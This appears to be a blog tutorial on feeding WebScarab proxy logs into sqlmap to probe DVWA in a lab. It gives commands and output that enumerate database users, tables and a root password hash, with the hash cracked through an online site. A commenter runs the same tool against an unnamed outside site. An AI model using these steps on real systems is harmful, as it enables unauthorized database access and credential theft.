[52:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:32] [INFO] testing 'Oracle AND time-based blind'
[52:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:34] [WARNING] GET parameter 'password_new' is not injectable
[52:34] [INFO] testing if GET parameter 'password_conf' is dynamic
[52:34] [WARNING] GET parameter 'password_conf' appears to be not dynamic
[52:34] [WARNING] heuristic test shows that GET parameter 'password_conf' might not be injectable
[52:34] [INFO] testing sql injection on GET parameter 'password_conf'
[52:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:35] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:35] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:36] [INFO] testing 'Oracle AND time-based blind'
[52:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:38] [WARNING] GET parameter 'password_conf' is not injectable
[52:38] [INFO] testing if GET parameter 'Change' is dynamic
[52:38] [WARNING] GET parameter 'Change' appears to be not dynamic
[52:38] [WARNING] heuristic test shows that GET parameter 'Change' might not be injectable
[52:38] [INFO] testing sql injection on GET parameter 'Change'
[52:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:39] [INFO] testing 'Oracle AND time-based blind'
[52:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:41] [WARNING] GET parameter 'Change' is not injectable
[52:41] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:41] [INFO] skipping 'http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'
[52:41] [INFO] url 11:
GET http://192.168.6.65:80/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:41] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/fi/?page=include.php
[52:41] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:41] [INFO] testing connection to the target url
[52:41] [INFO] testing if the url is stable, wait a few seconds
[52:42] [INFO] url is stable
[52:42] [INFO] testing if GET parameter 'page' is dynamic
[52:42] [INFO] confirming that GET parameter 'page' is dynamic
[52:42] [INFO] GET parameter 'page' is dynamic
[52:43] [WARNING] heuristic test shows that GET parameter 'page' might not be injectable
[52:43] [INFO] testing sql injection on GET parameter 'page'
[52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:43] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:44] [INFO] testing 'Oracle AND time-based blind'
[52:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:46] [WARNING] GET parameter 'page' is not injectable
[52:46] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/pentest/database/sqlmap/output/results-08102012_0452pm.csv'

[*] shutting down at: 52:46

root@bt:/pentest/database/sqlmap#

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note you can use online decrypter sites

MySQL4.1 uses sha1

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

4 thoughts on “web application – webscarab

  1. Hi !
    I’m practicing sqlmap SQL injection and there is a very serious problem :c
    These are the steps that are performed :
    1. Capturing a cookie on Live HTTP Headers
    img : http://i49.tinypic.com/2cqla8w.png

    2. wrote the following in sqlmap :
    C:\sqlmap> sqlmap.py -u URL-replaced –cookie=’PHPSESSID=2795f86459d52a77a344fa5dfc3e72c6; –string=’Surname’ –dbs –level 3 -p id

    This is the result:
    Code:
    sqlmap/0.9 – automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 10:53:40

    [10:53:40] [WARNING] the testable parameter ‘id’ you provided is not into the Cookie
    [10:53:40] [INFO] using ‘C:\sqlmap\output\URL-replaced\session’ as session file
    [10:53:40] [INFO] testing connection to the target url
    [10:53:48] [INFO] testing if the provided string is within the target URL page content
    [10:53:51] [WARNING] you provided ”First’ as the string to match, but such a string is not within the target URL page content original requ
    est, sqlmap will keep going anyway
    you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue
    using the HTTP Cookie values that you provided? [Y/n] y
    [10:53:57] [WARNING] heuristic test shows that GET parameter ‘id’ might not be injectable
    [10:53:57] [INFO] testing sql injection on GET parameter ‘id’
    [10:53:57] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
    [10:55:10] [INFO] testing ‘MySQL boolean-based blind – WHERE or HAVING clause (RLIKE)’
    [10:56:28] [INFO] testing ‘Generic boolean-based blind – Parameter replace’
    [10:56:29] [INFO] testing ‘Generic boolean-based blind – Parameter replace (original value)’
    [10:56:30] [INFO] testing ‘MySQL boolean-based blind – Parameter replace (MAKE_SET – original value)’
    [10:56:31] [INFO] testing ‘MySQL >= 5.0 boolean-based blind – Parameter replace (original value)’
    [10:56:32] [INFO] testing ‘Microsoft SQL Server/Sybase boolean-based blind – Parameter replace (original value)’
    [10:56:33] [INFO] testing ‘Oracle boolean-based blind – Parameter replace (original value)’
    [10:56:34] [INFO] testing ‘Microsoft Access boolean-based blind – Parameter replace (original value)’
    [10:56:35] [INFO] testing ‘SAP MaxDB boolean-based blind – Parameter replace (original value)’
    [10:56:36] [INFO] testing ‘Generic boolean-based blind – GROUP BY and ORDER BY clauses’
    [10:56:40] [INFO] testing ‘MySQL >= 5.0 boolean-based blind – GROUP BY and ORDER BY clauses’
    [10:56:44] [INFO] testing ‘Microsoft SQL Server/Sybase boolean-based blind – ORDER BY clause’
    [10:56:48] [INFO] testing ‘Oracle boolean-based blind – GROUP BY and ORDER BY clauses’
    [10:56:52] [INFO] testing ‘Microsoft Access boolean-based blind – GROUP BY and ORDER BY clauses’
    [10:56:56] [INFO] testing ‘MySQL stacked conditional-error blind queries’
    [10:58:15] [INFO] testing ‘PostgreSQL stacked conditional-error blind queries’
    [10:58:42] [INFO] testing ‘Microsoft SQL Server/Sybase stacked conditional-error blind queries’
    [11:00:17] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
    [11:01:04] [INFO] testing ‘PostgreSQL AND error-based – WHERE or HAVING clause’
    [11:01:53] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based – WHERE or HAVING clause’
    [11:02:38] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based – WHERE or HAVING clause (IN)’
    [11:03:24] [INFO] testing ‘Oracle AND error-based – WHERE or HAVING clause (XMLType)’
    [11:04:14] [INFO] testing ‘Oracle AND error-based – WHERE or HAVING clause (utl_inaddr.get_host_address)’
    [11:04:55] [INFO] testing ‘Oracle AND error-based – WHERE or HAVING clause (ctxsys.drithsx.sn)’
    [11:05:38] [INFO] testing ‘Firebird AND error-based – WHERE or HAVING clause’
    [11:06:22] [INFO] testing ‘MySQL OR error-based – WHERE or HAVING clause’
    [11:07:03] [INFO] testing ‘MySQL >= 5.0 error-based – Parameter replace’
    [11:07:05] [INFO] testing ‘PostgreSQL error-based – Parameter replace’
    [11:07:06] [INFO] testing ‘Microsoft SQL Server/Sybase error-based – Parameter replace’
    [11:07:08] [INFO] testing ‘Oracle error-based – Parameter replace’
    [11:07:09] [INFO] testing ‘MySQL >= 5.0 error-based – GROUP BY and ORDER BY clauses’
    [11:07:15] [INFO] testing ‘PostgreSQL error-based – GROUP BY and ORDER BY clauses’
    [11:07:20] [INFO] testing ‘Microsoft SQL Server/Sybase error-based – ORDER BY clause’
    [11:07:27] [INFO] testing ‘Oracle error-based – GROUP BY and ORDER BY clauses’
    [11:07:36] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
    [11:09:44] [INFO] testing ‘PostgreSQL > 8.1 stacked queries’
    [11:11:08] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries’
    [11:12:15] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
    [11:13:22] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
    [11:14:31] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind’
    [11:15:38] [INFO] testing ‘Oracle AND time-based blind’
    [11:16:37] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
    [11:25:02] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
    [11:33:35] [INFO] testing ‘MySQL UNION query (NULL) – 11 to 20 columns’
    [11:41:31] [INFO] testing ‘MySQL UNION query (NULL) – 11 to 20 columns’
    [11:49:10] [INFO] testing ‘MySQL UNION query (NULL) – 21 to 30 columns’
    [11:58:34] [INFO] testing ‘Generic UNION query (NULL) – 1 to 10 columns’
    [11:58:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:06:15] [INFO] testing ‘Generic UNION query (NULL) – 1 to 10 columns’
    [12:06:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:13:42] [INFO] testing ‘Generic UNION query (NULL) – 11 to 20 columns’
    [12:13:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:21:23] [INFO] testing ‘Generic UNION query (NULL) – 11 to 20 columns’
    [12:21:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:31:52] [INFO] testing ‘Generic UNION query (NULL) – 21 to 30 columns’
    [12:31:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:43:06] [WARNING] GET parameter ‘id’ is not injectable
    [12:43:06] [CRITICAL] all parameters are not injectable, try to increase –level/–risk values to perform more tests. Rerun without providin
    g the –technique switch. Give it a go with the –text-only switch if the target page has a low percentage of textual content (~9.17% of pag
    e content is text)

    [*] shutting down at: 12:43:06

    C:\sqlmap>sqlmap.py -u http://URL-replaced/plan.php?id=379 –cookie=’PHPSESSID=2795f86459d52a77a344fa5dfc3e72c6; –string=’Surname’ –dbs –level 3 -p id

    [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    —–
    [12:43:06] [CRITICAL] all parameters are not injectable, try to increase –level/–risk values to perform more tests. Rerun without providin
    g the –technique switch. Give it a go with the –text-only switch if the target page has a low percentage of textual content (~9.17% of pag
    e content is text).

    :C It may be exploitable vulnerability or am I doing something wrong can someone please help me.

    1. Can't help here. Will advise only use sql-map in lab environment or while performing a pre-approved pen test.

      Personally I like to automate sql map This is how.

      backtrack 5r1

      1. Open webscarab web proxy.

      /pentest/web/webscarab

      root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

      Surf a site and wait till it shows a injection point (You can see this look under tabs and Tree Selection filters. You should see URL / Methods / Status / Possible Injection - This is the area your interested in.)

      Once you get a few ticks (Normally keep surfing the site till you see 2 - 5 ticks under Possible Injection.) Note You may get some more from spidering the site.
      Then close webscarab.

      2. Look in your /tmp folder for the latest webscarab0087.tmp file. (Note I use the gui for this so can right click and copy the name of the file and location)

      3. Then change directory to /pentest/database/sqlmap

      look at the switches below, and how you present the location of /tmp/webscarab0087.tmp/conversations the webscarb possible injection point log to sqlmap. Note --scope=^IP-Address$ chnage to the ip address of the site been tested or url or you will attack all agreed sites in the /tmp/webscarab0087.tmp/conversations file.

      root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

      [02:35:19] [WARNING] no clear password(s) found
      database management system users password hashes:

      [*] root [1]:
      password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

      Note you can use online decrypter sites

      MySQL4.1 uses sha1

      http://www.md5decrypter.co.uk/sha1-decrypt.aspx

      263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

      [02:35:19] [INFO] fetching database names
      [02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
      available databases [4]:
      [*] dvwa
      [*] information_schema
      [*] mysql
      [*] w3af_test

      [02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
      Database: w3af_test
      [2 tables]
      +---------------------------------------+
      | customers |
      | users |
      +---------------------------------------+

      Database: dvwa
      [2 tables]
      +---------------------------------------+
      | guestbook |
      | users |
      +---------------------------------------+

      [02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
      Database: dvwa
      Table: users
      [6 columns]
      +------------+-------------+
      | Column | Type |
      +------------+-------------+
      | avatar | varchar(70) |
      | first_name | varchar(15) |
      | last_name | varchar(15) |
      | password | varchar(32) |
      | user | varchar(15) |
      | user_id | int(6) |
      +------------+-------------+

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s